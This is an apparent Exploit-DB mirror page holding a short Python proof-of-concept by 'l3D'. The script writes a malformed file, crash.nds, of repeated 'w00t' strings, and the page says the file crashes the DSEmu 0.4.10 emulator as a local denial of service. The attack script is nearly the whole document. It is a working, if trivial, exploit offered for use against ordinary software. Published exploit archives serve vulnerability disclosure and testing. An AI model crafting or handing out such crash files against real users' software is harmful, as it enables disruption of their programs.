exploit-db-mirror/exploits/windows/dos/12027.py
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

10 lines
No EOL
250 B
Python
Executable file

#!/usr/bin/env python
#DSEmu 0.4.10 (.nds) local crash
#Author: l3D
#Sites: http://xraysecurity.blogspot.com, http://nullbyte.org.il
#IRC: irc://irc.nix.co.il
#Email: pupipup33@gmail.com
blah=open('crash.nds', 'w')
blah.write('w00t'*12)
blah.close()